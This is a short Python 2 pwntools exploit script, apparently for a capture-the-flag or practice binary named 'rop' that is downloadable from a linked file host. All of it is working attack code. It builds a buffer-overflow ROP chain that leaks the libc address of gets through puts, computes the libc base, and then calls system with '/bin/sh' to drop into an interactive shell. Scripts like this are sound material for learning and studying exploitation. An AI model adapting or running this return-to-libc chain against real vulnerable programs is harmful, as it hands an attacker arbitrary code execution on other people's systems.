expl.py

#!/usr/bin/python2

from pwn import *

def padd(d):
    return d + '\00'*(8-len(d))

p = process("/home/nasm/rop")
# TO EDIT

# The binary: https://mega.nz/file/KTAFgCgQ#kaixyg495AlHonWvsza0KVkkdQpgVMIotrV86wwbpz8

e = ELF('/home/nasm/rop')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# TO EDIT (ldd rop to discover whith which libc the binary is linked)

padding = "A"*0x28

pld = padding
pld += p64(0x00400683) # pop rdi
pld += p64(0x601020) # got entry get
pld += p64(0x4004a0) # puts@plt
pld += p64(e.symbols['main']) # main

# gdb.attach(p.pid)

p.recvuntil("Hello\n")
p.sendline(pld)

leak = u64(padd(p.recvline().replace("\n", "")))

log.info("leak: {}".format(hex(leak)))

base_libc = leak - libc.symbols['gets']

log.info("libc: {}".format(hex(base_libc)))

system = base_libc + libc.sym.system

log.info("system: {}".format(hex(system)))

binsh = base_libc + next(libc.search("/bin/sh\00"))

log.info("binsh: {}".format(hex(binsh)))

pld = padding
pld += p64(0x00400684) # ret
pld += p64(0x00400683) # pop rdi
pld += p64(binsh)
pld += p64(system)

p.sendafter("Hello\n", pld + '\n')
#gdb.attach(p.pid)

p.interactive()